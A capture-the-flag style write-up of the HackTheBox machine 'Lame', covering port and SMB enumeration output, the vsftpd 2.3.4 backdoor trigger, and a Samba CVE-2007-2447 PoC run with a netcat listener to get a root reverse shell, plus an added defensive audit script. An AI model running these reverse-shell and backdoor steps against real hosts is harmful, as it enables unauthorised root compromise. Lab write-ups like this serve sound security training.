
Another Lame HackTheBox Writeup


 


 

A quick writeup of ‘Lame’ from HTB

 


Host Information
Hostname: Lame
Operating System: Linux
HTB Difficulty Rating: Easy

 


 

Enumeration

 

IP of box is 10.10.10.3

nmap

Running an nmap scan shows:

─➤  sudo nmap -sS -sV -p- -O -oA lame 10.10.10.3

[sudo] password for initinfosec: 
Starting Nmap 7.80SVN ( https://nmap.org ) at 2019-12-27 10:39 CST
Nmap scan report for 10.10.10.3
Host is up (0.044s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.35 seconds

Connecting to FTP showed that anonymous logins were allowed:

╰─➤  ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:initinfosec): anonymous
331 Please specify the password.
Password: 
230 Login successful.

Cool, we might be able to leverage this later for payload/malicious file upload if we need to. If we check briefly on searchsploit for vsftpd 2.3.4 we receive one result, showing a ruby msf exploit, based on this exploit. Apparently if you pass a “:)” as the username on the vsftpd login, some (not all) installs of vsftpd 2.3.4 will spawn a reverse tcp shell on port 6200.

We can briefly test this by running nc -lvnp 6200 then trying to log in with the username as :). This didn’t seem to do anything, so let’s move on.

Author’s note - it occurred to me when cleaning up this writeup that my initial test to check the vsftpd backdoor may not have been entirely accurate. I’d have to look more at the ruby code to see how the remote shell spawns on 6200. You could also confirm this with the msf module for this vulnerability, but either way, I moved on.

 

Further Enumeration of Samba

 

If the vsftpd app isn’t the vector to a shell, I have a hunch it will be a SMB/Samba vulnerability. Since 2 Samba/netbios ports are open, I try to enumerate NFS shares.

We can start with trying to enumerate Samba & see if it allows for null sessions. Let’s try enum4linux:

enum4linux 10.10.10.3
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jan 12 23:38:37 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.3
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.3    |
 ================================================== 
Can't load /etc/samba/smb.conf - run testparm to debug it
[E] Can't find workgroup/domain


 ========================================== 
|    Nbtstat Information for 10.10.10.3    |
 ========================================== 
Can't load /etc/samba/smb.conf - run testparm to debug it
Looking up status of 10.10.10.3
No reply from 10.10.10.3

 =================================== 
|    Session Check on 10.10.10.3    |
 =================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 437.
[+] Server 10.10.10.3 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 451.
[+] Got domain/workgroup name: 

 ========================================= 
|    Getting domain SID for 10.10.10.3    |
 ========================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 359.
Unable to initialize messaging context
rpcclient: Can't load /etc/samba/smb.conf - run testparm to debug it
[+] Can't determine if host is part of domain or part of a workgroup

 ==================================== 
|    OS information on 10.10.10.3    |
 ==================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 458.
Use of uninitialized value $os_info in concatenation (.) or string at /usr/bin/enum4linux line 464.
[+] Got OS info for 10.10.10.3 from smbclient: 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 467.
[+] Got OS info for 10.10.10.3 from srvinfo:
Unable to initialize messaging context
rpcclient: Can't load /etc/samba/smb.conf - run testparm to debug it

 =========================== 
|    Users on 10.10.10.3    |
 =========================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 866.
Use of uninitialized value $users in print at /usr/bin/enum4linux line 874.
Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 877.

Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 881.
Use of uninitialized value $users in print at /usr/bin/enum4linux line 888.
Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 890.

 ======================================= 
|    Share Enumeration on 10.10.10.3    |
 ======================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 640.
Unable to initialize messaging context
smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAME

[+] Attempting to map shares on 10.10.10.3
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 654.
//10.10.10.3/print$	Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 654.
//10.10.10.3/tmp	Mapping: OK, Listing: OK
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 654.
//10.10.10.3/opt	Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 654.
//10.10.10.3/IPC$	[E] Can't understand response:
Unable to initialize messaging context
smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 654.
//10.10.10.3/ADMIN$	Mapping: DENIED, Listing: N/A

 ================================================== 
|    Password Policy Information for 10.10.10.3    |
 ================================================== 


[+] Attaching to 10.10.10.3 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

	[+] LAME
	[+] Builtin

[+] Password Info for Domain: LAME

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: Not Set
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: Not Set

Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 501.

[+] Retieved partial password policy with rpcclient:



 ============================ 
|    Groups on 10.10.10.3    |
 ============================ 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 542.

[+] Getting builtin groups:

[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 542.

[+] Getting local groups:

[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 593.

[+] Getting domain groups:

[+] Getting domain group memberships:

 ===================================================================== 
|    Users on 10.10.10.3 via RID cycling (RIDS: 500-550,1000-1050)    |
 ===================================================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 742.

 =========================================== 
|    Getting printer info for 10.10.10.3    |
 =========================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 991.
Unable to initialize messaging context
rpcclient: Can't load /etc/samba/smb.conf - run testparm to debug it


enum4linux complete on Sun Jan 12 23:39:02 2020

 

Exploitation of Samba to gain a root shell

While a lot failed within the SMB scripts for enum4linux, we do see an important piece of info that is more helpful and tailored than what was provided by nmap - the samba version on the target system: Samba 3.0.20-Debian

Checking searchsploit reveals only 2 available exploits in their repo:

╰─➤  searchsploit Samba 3.0.20       
[i] Found (#1): /pentest/exploitation/exploit-db/files_exploits.csv
[i] To remove this message, please edit "/pentest/exploitation/exploit-db/.searchsploit_rc" for "files_exploits.csv" (package_array: exploitdb)

[i] Found (#1): /pentest/exploitation/exploit-db/files_shellcodes.csv
[i] To remove this message, please edit "/pentest/exploitation/exploit-db/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)

-------------------------------- ----------------------------------------------------
 Exploit Title                  |  Path
                                | (/pentest/exploitation/exploit-db/)
-------------------------------- ----------------------------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Use | exploits/unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Ov | exploits/linux/remote/7701.txt
-------------------------------- ----------------------------------------------------
Shellcodes: No Result

And based on the title of the second exploit, it looks like 3.0.20 may be too high a version for the remote heap exploit to work on.

Let’s check out the first one. So it looks like it’s a ruby file and is a module/exploit for use within metasploit. Checking out the exploit number 16320 on exploit DB gives us a bit more info: the associated CVE is CVE-2007-2447, and the vulnerability seems to lie in somehow allowing command execution attached to the username field.
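From the defender's side, the exposure described above can be checked from the Samba version string and smb.conf. The following is an added example, not part of the original writeup or the PoC: it assumes the affected range 3.0.0 through 3.0.25rc3 from the CVE description and the `username map script` option the PoC is named after; the sample config and its script path are constructed.

```python
import re

# CVE-2007-2447 range per the CVE description: 3.0.0 through 3.0.25rc3.
FIRST_AFFECTED, FIXED_IN = (3, 0, 0), (3, 0, 25)

# Constructed sample config (hypothetical script path), not taken from the box.
SAMPLE_CONF = """[global]
   workgroup = WORKGROUP
   Username Map Script = /usr/local/bin/mapusers.sh
"""


def version_affected(banner):
    """True for banners such as '3.0.20-Debian' or '3.0.25rc3'."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(?:(?:rc|pre)(\d+))?", banner.strip())
    if not m:
        raise ValueError(f"unrecognised Samba version: {banner!r}")
    nums = tuple(int(x) for x in m.group(1, 2, 3))
    if not FIRST_AFFECTED <= nums <= FIXED_IN:
        return False
    # 3.0.25 final carries the fix; its rc/pre builds (rc3 was the last) do not.
    return nums < FIXED_IN or m.group(4) is not None


def parse_smb_conf(text):
    """Return {section: {param: value}} using Samba-style name matching."""
    conf, section = {}, "global"
    logical = re.sub(r"\\\r?\n", "", text)  # join backslash-continued lines
    for raw in logical.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif "=" in line:
            key, value = line.split("=", 1)
            # Samba ignores case and whitespace inside parameter names.
            key = re.sub(r"\s+", "", key).lower()
            conf.setdefault(section, {})[key] = value.strip()
    return conf


def audit(version_banner, smb_conf_text):
    # Flags an affected version that also has the map script option set.
    script = parse_smb_conf(smb_conf_text).get("global", {}).get("usernamemapscript")
    affected = version_affected(version_banner)
    return {"version_affected": affected, "map_script": script or None,
            "usermap_vector_exposed": affected and bool(script)}
```

A host flagged here is remediated by upgrading Samba past the affected range or removing the `username map script` line from the [global] section.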

While this would be an ideal task for metasploit, I’m again trying not to use it, in prep for PWK/OSCP. Let’s see what other PoCs exist out there for the CVE.

 

‘Manual’/non-msf exploitation of Samba vulnerability

A quick google yields this promising github link. Let’s see if we can give it a whirl:

Within the exploits folder for this box, I’ll git clone the project, and we’ll end up with the PoC python script, like so:

╰─➤  git clone https://github.com/amriunix/CVE-2007-2447.git
Cloning into 'CVE-2007-2447'...
remote: Enumerating objects: 8, done.
remote: Total 8 (delta 0), reused 0 (delta 0), pack-reused 8
Unpacking objects: 100% (8/8), done.
╭─initinfosec@theMachine ~/writeups/HTB/lame/exploits  
╰─➤  cd CVE-2007-2447 
╭─initinfosec@theMachine ~/writeups/HTB/lame/exploits/CVE-2007-2447  ‹master› 
╰─➤  ll
total 8.0K
-rw-r--r-- 1 initinfosec initinfosec  991 Jan 13 00:08 README.md
-rw-r--r-- 1 initinfosec initinfosec 1.1K Jan 13 00:08 usermap_script.py

A quick peek at the code reveals it’s a python2 script, so let’s install the pysmb pip package as instructed by the readme with sudo pip2 install pysmb.

Great, now let’s try the script. First let’s check the usage from the readme:

CVE-2007-2447 - Samba usermap script.
</br>
https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

## Usage:

shell
$ python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>

  * `RHOST` -- The target address
  * `RPORT` -- The target port (TCP : 139)
  * `LHOST` -- The listen address
  * `LPORT` -- The listen port

I’ll go ahead and start a netcat listener on an arbitrary port with sudo nc -lnvp 43110.

OK, let’s give it a run:

╰─➤  python2 usermap_script.py 10.10.10.3 139 <VPN IP> 43110
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !

And checking our netcat terminal window:

╰─➤  nc -lvnp 43110
Connection from 10.10.10.3:51723

Awesome, we got a shell for the SMB vulnerability CVE-2007-2447 without metasploit. (Realistically, the python PoC does the same thing as the msf module, but still :) )

So let’s check things out quickly. As expected, with most SMB vulns like this, it’s a one-shot straight to root. But we can upgrade our shell, then grab the flags.

whoami
root
which python
/usr/bin/python
/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
root@lame:/# find / -name user.txt*
find / -name user.txt*
/home/makis/user.txt
root@lame:/# find / -name root.txt*
find / -name root.txt*
/root/root.txt
root@lame:/# echo -e "All Done. :) \n\n Thanks for reading. Catch you next time.\n\n"
\n\n"-e "All Done. :) \n\n Thanks for reading. Catch you next time." 
All Done. :) 

 Thanks for reading. Catch you next time.

~@initinfosec
